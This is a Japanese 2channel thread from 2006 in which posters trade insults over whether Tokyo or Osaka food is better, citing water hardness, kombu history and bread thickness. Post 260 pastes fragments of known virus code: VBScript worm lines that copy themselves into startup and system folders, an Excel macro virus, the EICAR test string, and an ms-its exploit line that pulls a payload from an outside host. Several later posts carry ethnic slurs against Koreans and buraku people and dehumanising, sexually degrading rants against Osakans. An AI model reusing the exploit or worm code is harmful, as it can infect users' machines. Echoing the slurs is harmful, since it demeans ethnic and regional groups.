 農家に生まれ子供の頃から湧き水で育った。飲み水の大切さを生活の中で教えられていた。川を誰もが大
切に守っていたのである、そうした思いを新たにした水質検査であった。

http://www.bund.org/culture/20060515-1.htm


東京と大阪の水の硬度を示した場合。ほぼ同じ硬度になっている。
世界的な水準で考えると日本の水はほぼ軟水と言う事が図からわかります。
大阪人は東京の水が硬水で出汁を取るのに向かないと言い張ってますが、実際には同じです。

http://www.con-pro.net/readings/water/doc0017.html



244 :もぐもぐ名無しさん:2006/12/25(月) 06:52:11

http://www.kyoto-np.co.jp/kp/special/shiokaze/shiokaze_index.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita01.html
近江商人が開拓した北海交易に雇われた北陸の船乗りが力をつけて独立、北前船交易が隆盛をきわめ、西回りで大阪まで昆布が持ち込まれるのは、江戸時代になってからだ。
この頃、白口浜の昆布が京、大阪へ届く。透明な出汁で京料理に欠かせない利尻昆布はさらに遅れる。

http://www.kyoto-np.co.jp/kp/special/shiokaze/kita02.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita03.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita04.html
かつお節
http://www.kyoto-np.co.jp/kp/special/shiokaze/kare01.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kare02.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kare03.html

京料理で重要なかつお節が出来上がったのは明治30年



245 :もぐもぐ名無しさん:2006/12/25(月) 06:53:16
「江戸食」が日本古来の和食の原点
http://www.athome.co.jp/academy/culture/cul17.html
江戸食文化紀行
http://www.kabuki-za.com/syoku/bkindex.html


246 :もぐもぐ名無しさん:2006/12/25(月) 08:48:22
何度も言わせるな。


東京には地方から最高級の食材、最高の料理人があつまる。
言わば東京人=天皇、地方人=平民。
献上品のような食材があつまる東京に地方が勝つわけねーだろ。

247 ::2006/12/25(月) 08:54:03
そうだとしても、お前の口に入る事は、まず無いな。

248 :もぐもぐ名無しさん:2006/12/25(月) 09:12:51
>>246
地方が東京人から金巻き上げるために出荷してんだよ
割り増し料金でな
今日もがんばって働けよ、東京人
つーか、コピペ狂のお仲間をなんとかしとけ

249 :もぐもぐ名無しさん:2006/12/25(月) 12:32:32
関東人って、無意味なコピペして何が言いたいの?
せめてコピペを用いて、主張したいなら俺は、こう思
うくらいの意見を述べよ。

250 :もぐもぐ名無しさん:2006/12/25(月) 12:55:31
東京の食いもんがまずいと言うスレなのに何で東京人は必死なん?

251 :もぐもぐ名無しさん:2006/12/25(月) 13:08:57
いくら最高級の食材でも、新鮮さでは地方に劣る東京

252 :もぐもぐ名無しさん:2006/12/25(月) 13:14:06
なるほど。東京は江戸時代から変わってないんだね。
金持ちだけがうまいもの食って庶民にはカレーやラーメンで我慢させてると。
俺、地方庶民だけど、死んでも東京には住みたくないな。

253 :もぐもぐ名無しさん:2006/12/25(月) 13:17:03
いい食材は、全国から東京へってある種、地方出の田舎者の
妄想だろうな。憧れが、妄想へと、しかし現実が判った連中は
この板で不満をぶつけてるんやろ
って事は、魂の叫びって事?おせ〜てカッペ君。

254 :もぐもぐ名無しさん:2006/12/25(月) 13:25:11
>>246
確かに二級品の食材をいじくりまわす技術は東京の料理人が上だな

255 :もぐもぐ名無しさん:2006/12/25(月) 14:08:52
あのー、地方人が東京への劣等感を思いっくそ吐き出すスレ
があると聞いてきたんやけど、ここでっか?

256 :もぐもぐ名無しさん:2006/12/25(月) 14:31:38
東京には食材が集まると言うよりは集めてるんだよな。
他のどの地方でも、多少種類が違うが魚や野菜など通常食卓に上るようなものはほぼ自前でとれる。
もちろん他県に出荷するほどの特産物以外のものの話だよ。
自前でとれるということが都会人にはわかりにくいだろうが、早い話が2級品以下はいくら値段を下げ
ても売れない。だからそういうものが流通するしくみそのものが無いわけだ。田舎者が都会に移住して
最初に驚くことのひとつがここ、田舎と同じような見かけでちょっと高い食材を買う→マズー 最初は風土
の違いで好まれる味が違うのかなと思う。ところがちょっと高級な店に行くと田舎と同レベルのものがある。
ただし値段は倍以上だ。ここで、ああ都会の人の大半は地方から集めてきた二級品で暮してるんだなと
わかる。

257 :もぐもぐ名無しさん:2006/12/25(月) 14:43:22
自前で取れるって・・・・前に食料自給率のデータで論破されたのに・・・・

258 :もぐもぐ名無しさん:2006/12/25(月) 14:58:12
大阪人必死だな

259 :もぐもぐ名無しさん:2006/12/25(月) 17:01:54
p

260 :もぐもぐ名無しさん:2006/12/25(月) 17:03:46
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file#http://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file#http://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


261 :もぐもぐ名無しさん:2006/12/25(月) 17:17:19
自給率のデータって?
東京では他府県にくらべて輸入食材が圧倒的な量で、小松菜くらいしか自給してないって話?

262 :もぐもぐ名無しさん:2006/12/25(月) 17:19:31
>>256
頭の悪いヤツの文章はムダに長くて読んでて疲れるな
内容がデムパなら尚更

つーか、田舎のスーパーなんか中国産野菜だらけだよ


263 :もぐもぐ名無しさん:2006/12/25(月) 17:23:59
>>256
非情に分かりづらい文章だが、つまりこういうことか?

●田舎
 殆ど全ての食材を自給自足
 しかも一級品
 二級品はどんなに値段を下げても売れないから売っていない
 二級品は東京に輸出

●都会
 基本的に普通に売っている物は二級品だらけ
 田舎と同レベルの食材は限られた高級店にしかない、値段も倍以上


デンパもここまで来ると国宝級だなw

264 :もぐもぐ名無しさん:2006/12/25(月) 17:26:37
>>251
生け簀厨発見!

あんだけ恥かいてまだ懲りないのかよw
お前は殺したての新鮮な牛肉や、生け簀から上げたtの新鮮魚を食って喜こんでろw

265 :もぐもぐ名無しさん:2006/12/25(月) 17:31:53
しかし、散々東京には独自の食文化がない、和食の発祥は大阪とかデンパまき散らして
完全論破されると、今度は食材自給率とか鮮度とかに話を持っていく、
で、次論破されると、今度は空気、それも論破されると物価、それも論破されると店、次は
家庭料理、で発祥と永久ループですな。

このスレは無職のニートを相手にしてくれる優しい人が多くて良かったね(^.^)b>>251,254,256

266 :もぐもぐ名無しさん:2006/12/25(月) 18:00:20
http://ohisama5.hp.infoseek.co.jp/teasobi/17oosaka.mp3

大阪名物の歌(悲しみと哀愁が漂っている)



267 :もぐもぐ名無しさん:2006/12/25(月) 18:11:33
主要なものが地方で一切自給で賄うとして・・・
日本人の10分の1が東京都民だけど日本の食料自給率は6割・・・
東京人が一切国産を食べないと仮定したら地方人の6倍以上の
大食漢ということですね

有り得ませよねぇ


268 :もぐもぐ名無しさん:2006/12/25(月) 19:06:30
>>267
しかも地方では一級品しか食べないそうですよ
余った二級品は東京に輸出

普通に考えて全生産量の殆どが一級品と言うことはないので、まあせいぜい2割ぐらいと仮定しても
地方は食糧自給率500%!!!
で、生産の8割以上を東京に輸出
いくら東京が人多いと言っても、これは食い杉だろww


269 :もぐもぐ名無しさん:2006/12/25(月) 19:45:23
 ´   ヾ
 ゛ (⌒) ヽ 
 ((、´゛))  
  . |||||     <ワイのパソコンがウイルスに感染したでぇ〜
   |||||| .б  ______
  ∧阪∧∩   | |\___\
 < #`Д´>ミ.. |..|  |☆☆☆|
 |(つ  ノつ☆. | |/ ̄ ̄ ̄/
 |.ゝ  !二二二」二二二二二|
  ̄〈_7_7  | |      | |



270 :もぐもぐ名無しさん:2006/12/25(月) 21:47:32
>>262
>つーか、田舎のスーパーなんか中国産野菜だらけだよ
どこの田舎?それ
俺の行きつけの地方スーパーでは中国産野菜はパックの山菜くらいしか見ないな
北の方なので冬場は埋けた野菜が食えるし

271 :もぐもぐ名無しさん:2006/12/25(月) 22:02:25
>>270
もう聞くのは諦めたけど、例によってどこに住んでるかは書けないんですよねw

272 :もぐもぐ名無しさん:2006/12/25(月) 23:58:45
東京人が認識しているのは関東近県の田舎、それしかイメージできないんだろ。
そりゃ人も金も物も東京に吸い取られて流通は東京におんぶにだっこの
出がらしみたいなところには何も無いよな。

273 :もぐもぐ名無しさん:2006/12/26(火) 03:39:58
東京築地市場には地方から沢山の魚・青果が送られて来てますが最高級品は東京その他は地方の市場に送られているのが現状です。

274 :もぐもぐ名無しさん:2006/12/26(火) 04:00:48
定期的に日本語の怪しい奴が現れるなw

275 :もぐもぐ名無しさん:2006/12/26(火) 06:36:02
むしろ>>272の印象論がみっともない


276 :もぐもぐ名無しさん:2006/12/26(火) 08:23:56
東京は醤油がまずいのでどんな食材も台なしにしてしまう。

277 :もぐもぐ名無しさん:2006/12/26(火) 09:33:50
東京は高級店が関西以上に数だけはある
質は変わらない
スーパーの質はかなり低い
つまり、一部の金持ちだけしか標準以上の物を口に出来ない

278 :もぐもぐ名無しさん:2006/12/26(火) 09:35:22
>>272
>>271

279 :もぐもぐ名無しさん:2006/12/26(火) 09:36:58
  Λ_Λ   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 <=( ´∀`) < 東京の醤油はカプサイシンが足りないニダ
 (>>276)  │
 | | |   \__________
 〈_フ__フ


280 :もぐもぐ名無しさん:2006/12/26(火) 09:37:31
>>277
日本語でおk

281 :もぐもぐ名無しさん:2006/12/26(火) 09:44:55
>>280
真摯に受け止めないから、いつまで経ってもカッペの域を
超えられんよ。

282 :もぐもぐ名無しさん:2006/12/26(火) 09:57:12
>>281
死んでおk

283 :もぐもぐ名無しさん:2006/12/26(火) 10:04:21
http://www.kippo.or.jp/culture/syoku/interview/interview.html

(抜粋)
京・大坂が、一方はお公家さんの町、一方は商人の町だとしたら、江戸は侍と職人の町でした。どちらも肉体労働で汗をかく人達ですから、彼らが好むのは、あの上方の持つあいまいな、舌で探るような味ではなく、はっきり、しっかりとした、誰にでもわかる味でした。

284 :保健所の人、調べてください:2006/12/26(火) 10:16:12

ごま煎餅に含まれる胡麻にはカビているものが多い。
煎餅をよく噛んでいると時々シュワーっとカビ臭い味が広がるからよく分かる。
恐らく、安くて品質の悪い外国産の胡麻を使用している事が原因だろう。
大体、4〜5枚に1枚の割でカビた味のする胡麻が入っている。

もし、そう言うものに当ったら商品名を晒してください。


285 :もぐもぐ名無しさん:2006/12/26(火) 10:46:13
>>282
子供は、家の掃除の手伝いでもしとけ

286 :もぐもぐ名無しさん:2006/12/26(火) 10:50:57
http://www.kippo.or.jp/culture/syoku/interview/interview.html
(抜粋)
江戸にも名のある料亭はありました。
しかし諸藩の江戸屋敷詰めの留守居という上級武士達が、
他藩との交渉や豪商との金策のために利用しており、
一種の料亭政治のはしりですね。
そしてそれらのほとんどは1923年に起きた関東大震災で倒壊。
現在、東京にある有名料亭のほとんどが関西出身なのはそのためで、
以来、上方料理が全国の料亭料理に影響を与えてきました。

287 :もぐもぐ名無しさん:2006/12/26(火) 11:00:20
>>281
天唾って知ってる?w

288 :もぐもぐ名無しさん:2006/12/26(火) 11:16:22
>>287
そのまま呑み込んどけ

289 :もぐもぐ名無しさん:2006/12/26(火) 11:53:21
みんなが待ちに待ったドラクエモンスターズジョーカーがついに発売します!
君も一緒に攻略しよう!さあこの板へレッツ!スタンバイ
【ドラクエ】DQM-J 徹底攻略スレpart1 
http://game11.2ch.net/test/read.cgi/handygame/1167022520/

290 :もぐもぐ名無しさん:2006/12/26(火) 14:02:26
★天唾とは★

大阪には、天神橋筋という、長大なアーケードの商店街区がある。
ここは、ブタの兜焼き、猿の干物、馬肉を漬け込んだ朝鮮漬け、エイの糞漬け、
などなど世界の珍味奇食があることでも有名だ。
勿論、日本人以外の外国人の姿も多い。
そして、彼らのマナーは、例外なく悪い。
そして大陸、半島の出身者を中心に、手洟をかんだり、痰を吐いたりする行為
があまりにも頻繁で、天神橋筋の舗道はテラテラと輝き、遠目には黄金を
敷き詰めたように見える。
しかし、その異臭は凄まじく、何より、ヌルヌルの舗装で足を滑らせて転倒、
大怪我をする事故が続出した。
そのため、大阪ではこれを「天神橋筋の唾」、略して「天唾」と呼び、恐れた。
これに由来して、自分の吐いた唾で転ぶ、自業自得のことをも、「天唾」と
称するに至った。

291 :もぐもぐ名無しさん:2006/12/26(火) 14:47:18
東京で売ってるトーストは8枚切りとかの極薄トースト。
大阪は5枚切りとかの分厚いのが主流。

292 :もぐもぐ名無しさん:2006/12/26(火) 14:57:59
東京は6枚だな

293 :もぐもぐ名無しさん:2006/12/26(火) 15:27:52
東京だけど4枚切り

294 :もぐもぐ名無しさん:2006/12/26(火) 15:31:45
>>291
既出
地域の違いって事になってる。


295 :もぐもぐ名無しさん:2006/12/26(火) 15:51:39
ここのスレをざっと見て気づいたんだけど
東京人って江戸時代の文化の中心は江戸だと思ってるだろ?

296 :もぐもぐ名無しさん:2006/12/26(火) 15:58:07
日本史習うまでは中心だと思ってた、確かに。

297 :もぐもぐ名無しさん:2006/12/26(火) 16:20:06
パン焼き用のトースターが6枚切りの幅しかなかったから全国的に6枚切りが支流だった
こんな馬鹿馬鹿しい事も言われないと気がつかない大阪人て何者なのよ

298 ::2006/12/26(火) 16:22:26
トースターってか 一部で見直されてるみたいだが
殆どの家庭では、オーブントースターやろ

299 :もぐもぐ名無しさん:2006/12/26(火) 16:41:22
レンジにオーブン付きが常識だろ。
トースターなんて古すぎ。

300 :もぐもぐ名無しさん:2006/12/26(火) 16:49:18
分厚いパンや大きめのイギリスパンなどでも対応しているトースターも最近はある
銀色のレトロなデザインの商品が最近良く売れている。
インテリアにしてもおしゃれということです。
手切りの厚手のパンをトースターに入れて火事になったり外国ではトースターによる
火災が実際にあったらしい。

ちなみに、ホットサンドウィッチメーカーなどに使用するパンの標準サイズになっているパンは
帝国ホテルのホテルブレッドらしい。
パン屋さんの食パンや市販の大手メーカー製のパンだと見栄え良く上手にホットサンドができない
場合が多いので、人によっては帝国ホテルで仕入れている人も居る。

最近は帝国ホテルサイズのパンが多いので、それほど困る事は無い。

301 :もぐもぐ名無しさん:2006/12/26(火) 16:55:29
食パンやトースターまでブランド志向かよ。
マジ東京人の価値観はキモイな。

302 :もぐもぐ名無しさん:2006/12/26(火) 16:59:12


303 :もぐもぐ名無しさん:2006/12/26(火) 17:22:01
>301
たこ焼き器にはブランドないもんなぁwwwwwwwww

304 :もぐもぐ名無しさん:2006/12/26(火) 18:35:03
>>291
食パンと言えばイギリスだけど、イギリスには6枚切りとか分厚い物はない
そもそも日本のように水分たっぷりのモチモチした柔らかいパンは無いんだけどね
まあ食文化の違いだけど、偶にイギリス流のなんか粘ってて歯ごたえのある極薄の食パン食べたくなるな。日本では殆ど作られていない。

つか、東京には(つーか全国どこにでも)薄切りの食パンも厚切りの食パンも両方あるに決まってるだろw


305 :もぐもぐ名無しさん:2006/12/26(火) 18:36:46
東京には、有名なパン屋ってあるの?

306 :もぐもぐ名無しさん:2006/12/26(火) 18:42:37
>>295
文化の中心はリスボン、もしくはコンスタンチノーブル及びアドリア海沿岸地域
これはガチ

307 :もぐもぐ名無しさん:2006/12/26(火) 18:46:58
>>301
散々、西食の食文化や歴史を自慢して、言い換えされると
ブランド志向キモイですかw
素晴らしいダブルスタンダードですねw

308 :もぐもぐ名無しさん:2006/12/26(火) 23:22:10
東京の連中は、食べ物の、どのジャンルなら対抗出来るんや?

309 :もぐもぐ名無しさん:2006/12/26(火) 23:23:55
阪在者の特徴
1・部落とかチョンとか差別用語が大好き。でも、自分に矛先が向かってくるとムキになって直ぐ火病。
2・短時間のうちにみえみえの自作自演で一人悦に入る。
3・ヴォロヴォロに叩かれても何故か勝手に勝利宣言。
4・で、議論に負けると「頭狂」「頭狂」もしくは「もんじゃはゲロ」とか下品な戯言をグワバババと連投。
5・「東京の食い物は不味い」と言いながら具体例はゼロ。
6・日本全国から嫌われているのに大阪批判は東京の仕業と被害者意識だけは旺盛。
7・人に火病と必死にレスする自分が一番火病している件についてw
8・大阪を東京と言い換えただけの改変コピペがお得意w
9・このネタスレですら毎日稚拙な捏造ネタを連発するも瞬時に論破され、連日惨めに敗走を繰り返すw
10・恥ずかしいからか阪在者であることを隠蔽し、東京vs地方の構図に誘導するも、全国から賛同なく
あっというまに日本vs大阪の構図に自然となってしまいあっけなく敗走。
11・現在に自信が無いのでどこかの半島の奴らと同じくやたらと発祥に拘るが、肝心の発祥が捏造
(詐称)だらけな件についてw
12・味の話題が直ぐ値段の話題にすり替わる。



310 ::2006/12/26(火) 23:29:37
お、久しぶりやな「陳 華寿」

311 :もぐもぐ名無しさん:2006/12/26(火) 23:33:11
まあ、大阪はケチケチしているから良いものは食えないな。
たまたま美味い店が有ったとももったら東京進出してたりする。
大阪は安かろう不味かろうの典型的田舎料理ばかり。
阪神地方って何であんなに下品な連中ばかりなんだろう?
かっぺ丸出しの癖に他所を認められない下衆だらけ。


312 :もぐもぐ名無しさん:2006/12/26(火) 23:37:43
>>311
お前のような、どっち付かずのカッペよりマシ。

313 :もぐもぐ名無しさん:2006/12/26(火) 23:38:17

キチンとした実例と文化的、歴史的、地域的事実を挙げて東京の食べ物はこういう点がイマイチだね
という話なら、各地方の特性や名産などをふまえたそれなりにちゃんとした議論になるだろうが、実際は

1.現実感のない妄想と思い込みで口汚く東京叩き

2.具体的な店名や、自分の住んでいる地域すら言わない

3.皆から呆れられてちょっと煽られると火病を起こして大阪人の本性を現す

4.当然のように、大阪人が言うに事欠いて「東京の食い物はマズイ}だって? ( ´,_ゝ`)プッ ってな流れ

5.大阪人ますます火病を起こして、罵詈雑言の嵐。又は東京vs地方の争いに誘導しようとするも失敗。 ←今ココw

6.低脳な大阪人がヒッシになって暴れている事は看破されているので、ますます大阪が叩かれる。

こうだからな



314 ::2006/12/26(火) 23:46:19
おい!陳 華寿、ええ加減にしいや
また、ボコボコにするで〜

315 :もぐもぐ名無しさん:2006/12/26(火) 23:55:58
『まず、他人が見て面白いことを書きましょう。大勢の読者がいることを意識してください。
サーバやシステムのリソースは無限じゃありません。』

〜2ちゃんねるGUIDEより〜

大阪無職終わってるな・・・・

316 :もぐもぐ名無しさん:2006/12/27(水) 04:07:25
東京無職はコピペばかり

317 :もぐもぐ名無しさん:2006/12/27(水) 04:40:40
ここで陣取って稚拙な擁護でイキがっても、
ν即あたりで東京スレが立つと食い物・水・空気が悪いことはケチョンケチョンに叩かれるんだけどな。
ここでも論理的な反論も皆無に近いし、いかげんあきらめなよw

318 :もぐもぐ名無しさん:2006/12/27(水) 07:14:17
ニュー速の東京叩きってすごく厨クサイんだけどねw

319 :もぐもぐ名無しさん:2006/12/27(水) 07:26:35
ニュー速で東京叩きしても空気の読めない馬鹿扱いで思い切りスルーされてますが
ここで論理的に反論してるのはむしろ東京側だしね

320 :もぐもぐ名無しさん:2006/12/27(水) 10:02:41
ν速の東京叩き厨房って2〜3人の同一IDの奴が「また頭狂か!」って連カキしてるけど
ほとんどスルーされてるよな〜
事件が大阪ならみんな一斉に「また大阪か!」の大合唱なのにね・・・

321 :もぐもぐ名無しさん:2006/12/27(水) 15:50:52
>>314
まず、キチンとした実例と文化的、歴史的、地域的事実を挙げて
自分の住んでいる地域を明らかにしたら議論に入れてあげるよ、ボクw

322 :もぐもぐ名無しさん:2006/12/27(水) 15:55:12
>>317
ニュー即住民だが、ニュー即の東京叩きって、大阪があまりにも叩かれるから(まあ叩かれて当然なんだが)悔しくってたまらない
大阪人が粘着荒らししてるだけでしょ。大阪を東京に変えただけの「また東京か」とか相違も工夫も根拠もウィットも無いw

あ、なんだこのスレと同じ構図じゃんw 大阪人ってどこでも変わらないんだなww


323 :もぐもぐ名無しさん:2006/12/27(水) 17:24:12
>>321
人に頼む前に己から自分の住んでいる地域を明らかにしろ
社会通念も無いのか?
それ以前に、マナーも箸の持ち方も出来てないんと違う?え、君。

324 :もぐもぐ名無しさん:2006/12/27(水) 17:47:55
芦屋だが何か?

325 :もぐもぐ名無しさん:2006/12/27(水) 17:48:40
荒らしの大阪無職が社会通念なんてどの面下げて言うんだか
本当にしょうがない奴だ(笑)

326 :もぐもぐ名無しさん:2006/12/27(水) 17:56:43
>>324
おいおい、勝手にレスするなよな

327 :もぐもぐ名無しさん:2006/12/27(水) 17:58:03
>>323
いや、東京ですが何か?
前々スレでもそうやって噛みついてきた人居たけど、目黒ですがと言ったらその後無反応だったね。
キミもどうせ書けないんでしょ?

328 :もぐもぐ名無しさん:2006/12/27(水) 17:59:08
>>327
@神戸だが

329 :もぐもぐ名無しさん:2006/12/27(水) 18:00:13
まあぶっちゃけ書くまでもなく分かるけどな
>>323は鶴橋

330 :もぐもぐ名無しさん:2006/12/27(水) 18:09:43
尼崎ニダ

331 :もぐもぐ名無しさん:2006/12/27(水) 18:35:58
>>328
で、その神戸の人が東京は空気がマズイ、東京発祥の料理など無い
東京の食糧自給率は低い、地産地消に勝る物無し、取れたての野菜をそのまま
取れたての魚貝をそのまま食べるのが普通、東京は食文化が貧弱、東京の名物は全てどこかかからの
借り物なんて寝ぼけたこと言ってるわけね・・・・┐(´ー`)┌

332 :もぐもぐ名無しさん:2006/12/27(水) 20:24:04
>>331
ん?大丈夫?


333 :もぐもぐ名無しさん:2006/12/27(水) 21:09:26
>>332
>>321

334 :もぐもぐ名無しさん:2006/12/27(水) 21:25:31
>>331
ほぼ正しいやろ
せいぜい他所の素材と他所の食文化をパクった借り物料理で喜んでろやw

目黒クンww

335 :もぐもぐ名無しさん:2006/12/27(水) 22:45:06
            __,,..、、- - - .、、...,,___
       ,,、‐''"~ ̄            ̄``''‐、、
     /                      \
    /                         ヽ
   /                           ヽ
   /  / ~~` '' ‐- 、、 ,,__   __ ,,..、、 -‐ '' "~~\  ヽ
   |  /    __           ̄       __   ヽ  |
  .|  {  ´   ‐- ....__    __... -‐   `   } .|
  .|  〉,,・^'' - .,,      ~  i ~    __,,.- ^`・、.〈  |
./ ̄|  /,/~ヽ、  `'' ‐--‐ ,.| 、‐-‐'' "~   _ノ~\,ヽ | ̄ヽ
| (` | / ヽ,,_____`‐-、_、..,,___ノ八ヽ___,,.._-‐_'"´___,, ノ ヽ .|'´) |
| }.| ./'   \二二・二../ ヽ  / ヽ、二・二二/  'ヽ | { |
.| //| .|          / |  |. \         | |ヽヽ|
.| .| | .|        /    |  |.    \       | | | .|
|ヽ.| |      /     .|  |.     ヽ      .| .|./ .|
 |  .| |     /      |  |        ヽ     |  | /   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ヽ .| |    /       .|  |       ヽ    |  | /  |  そろそろ
  .ヽ.| |    /     '二〈___〉二`       ヽ   |  |./  <
    | |          `-;-′         |  |     |  本題に入ろうか・・・
     iヽ|.      ,,... -‐"`‐"`'‐- 、、     |/i       \_________
     |  ヽ     /...---‐‐‐‐‐----.ヽ    /  .|
     |   ヽ.    ,, -‐ ''"~ ~"'' ‐- 、    /   |
    .|    ヽ         !          ./   .|
    ,,|     ヽ.         |        ./     |、
    |\.     ヽ            /     /.|
   .|.  \.      ヽ、____   ___/    /   .|
   '     `            ̄ ̄       ´     '

336 :もぐもぐ名無しさん:2006/12/27(水) 22:58:14
>>334
へー、じゃあ神戸発祥の有名料理や神戸の食糧自給率
神戸の名産品、神戸の地産地消、神戸の取れたて農海産物
神戸の食文化を具体的に語ってよ

なにかを 貶して批判するというのは、それが低レベルだと判断できるだけの
材料、つまり高レベルな食や文化を知っていると言うことなので、答えられないはずは無いよな。

答えられなければ、ただの妄想と言うことで

337 :もぐもぐ名無しさん:2006/12/27(水) 22:59:38
>>336
お前、誰のレスかの判断も付かんのに
訳の判らん事をほざくなよ。

338 :もぐもぐ名無しさん:2006/12/27(水) 23:00:42
すまん。
謝る、調子に乗りすぎた。

339 :もぐもぐ名無しさん:2006/12/27(水) 23:03:54
>>338
了解。

340 :もぐもぐ名無しさん:2006/12/27(水) 23:05:34
おい!こら!ぜーろく!

99%以上の贅六は他都県道民よりも劣っているんだ。これは絶対だ!
ほんと、贅六同士でダメな日本人を引き合いに出して優位に立つ幻想に浸って傷の舐め合いとか見てて哀れだよwwww
贅六はちっぽけな存在だ。
寝て起きて芋食って屁こいて寝て。と、動物みてーだなwwwww
知性の欠片もない。
同類の男女でたむろって楽しいか?
ちっぽけな町。ちっぽけなダンボールハウス。
ちっぽけなタコヤキ。ちっぽけな人生…  
オマエラにだって欲はあるだろ?チヤホヤされたいだろ?
ぃい女抱きたいだろ?いろんな物が欲しいだろ?いろんな経験したいだろ?金欲しいだろ?
夢見るなよ。ぜーろく。

贅六は見てて恥ずかしいよ。
まともな生活保護すら受ける資格も持たない。
履歴書にも本籍地生野区鶴橋だの西成区釜ヶ崎だよ?吐き気がするね。
大阪人で海外留学? ちょっと殺すよ?
まともな語学力もない贅六が留学したら、俺ら日本人の顔に泥を塗ることになるんだ。
無能な贅六集団で縄張りなんか作って傷の舐め合い。
バカ女は黒人の肉便器。男はその肉便器のケツを追っ掛ける…
本人の自由だろって?自由の意味を吐き違えられちゃ困るね。
自由というものには責任もつくんだよ。
君らゴミに責任能力などないくせに大口叩いてもらっちゃ困るよ。


341 :もぐもぐ名無しさん:2006/12/27(水) 23:06:36
そうだよ!贅六は人並み以下の努力もしないで、人並み以上の特権を要求する。
日本はバリアフリー化が進んで体が不自由な方も住みやすくなったが、
同時に経済発展で贅六という名の知的障害者も恥ずかしさを感じずにスカしていけしゃあしゃあと生きていやがる。
でも、こんな時代は終わるよ。二極化で勝ち組と負け組のどっちかになるほかない。
アタマの悪い贅六は将来と言っても明日明後日までとかで先のことなんか考えられない。
長期的スパンで考える知能がないからね。
だから生活保護をふんだくってホームレスなんてふざけきった考えなんかが浮かぶ。
もう自分が贅六だったらと考えたら恐ろしいね。夜も眠れないよ。

生きてて恥ずかしくない?
あ、恥ずかしくないから贅六としてのうのうと生き永らえてんだwwwwww

342 ::2006/12/27(水) 23:09:20
変な奴が出没しましたな〜

343 :もぐもぐ名無しさん:2006/12/27(水) 23:31:28
知性も江戸時代で止まってるだけだろ

344 :もぐもぐ名無しさん:2006/12/27(水) 23:50:33
東京に食糧自給率ってあんの?

345 ::2006/12/28(木) 00:20:40
犬阪腐にもないなwwwwwwwwwwwwwwwww

346 :もぐもぐ名無しさん:2006/12/28(木) 02:28:54
このスレを見ている人はこんなスレも見ています。(ver 0.20)
ドケチ御用達クレジットカード その2 [ドケチ]
モータースポーツ板実況総合案内所スレッド [モータースポーツ]
倉庫・物流スレ 第2倉庫目 [転職]
ヤフオク「全員」入札無料◆イタズラ入札(つд`) [オークション]
電波文くらべ [電波・お花畑]

m9(^д^)プギャー!

347 :もぐもぐ名無しさん:2006/12/28(木) 04:29:27
誰だよw
プロファイリングすると、ケチで車オタで仕事は倉庫番、オクに入札できないほど貧乏で電波が好きと。
これたしか専ブラユーザーのは反映されてないんだよな。

348 :もぐもぐ名無しさん:2006/12/28(木) 08:39:12
東京は家賃が高いから激薄トーストしか食えないんだってね。
分厚いとすぐ無くなっちゃうから。
涙ぐましいほど貧乏生活なんだね。

349 :もぐもぐ名無しさん:2006/12/28(木) 08:41:11
>>345
気の毒な程、低脳ですね。

350 :もぐもぐ名無しさん:2006/12/28(木) 08:58:41
>>336
ちなみに俺、神戸じゃないよw 北海道
「〜やろ」で釣れたねww
必死過ぎて笑えるね、目黒クンwww (・∀・)ニヤニヤ

351 :もぐもぐ名無しさん:2006/12/28(木) 09:05:11
北海道にも見捨てられた!
哀れ東京w

352 :もぐもぐ名無しさん:2006/12/28(木) 10:04:22
>>348
田舎者らしい微笑ましい発言だね
前にトンカツの肉は厚いほど良いとか言ってた無知と同類かい?

353 :もぐもぐ名無しさん:2006/12/28(木) 10:11:20
毎回しゃしゃり出てきては一瞬にして論破されてる北海道バカか
そんなにニセ大阪人になりたいのか?w

354 :もぐもぐ名無しさん:2006/12/28(木) 10:22:57
>>337
>>314>>328>>334>>337は別人だと言い張るのですか?
>>314は例のコピペに異常に反応する下品な大阪人っぽいけどw

まあ、お前の>>334のレス内容だけで、素直に>>336の疑問がわくだけだが
東京をこれだけ否定する神戸人の考える神戸の食とはいったいどんなモノなのかとね

最もマトモに答えられない時点でどんなモノかは大体想像が付くけどねw

次、神戸牛がどうとか言ってくると予想w




355 :もぐもぐ名無しさん:2006/12/28(木) 10:29:40
>>348
ほんの少し前に論破されていることを、再反論するでもなくまた書き込むってのは
よほど恥知らずなのか、自分に都合の悪い書き込みは自動あぼーんされるブラウザを
使っているのかどっちですか?


356 :もぐもぐ名無しさん:2006/12/28(木) 10:31:04
>>350
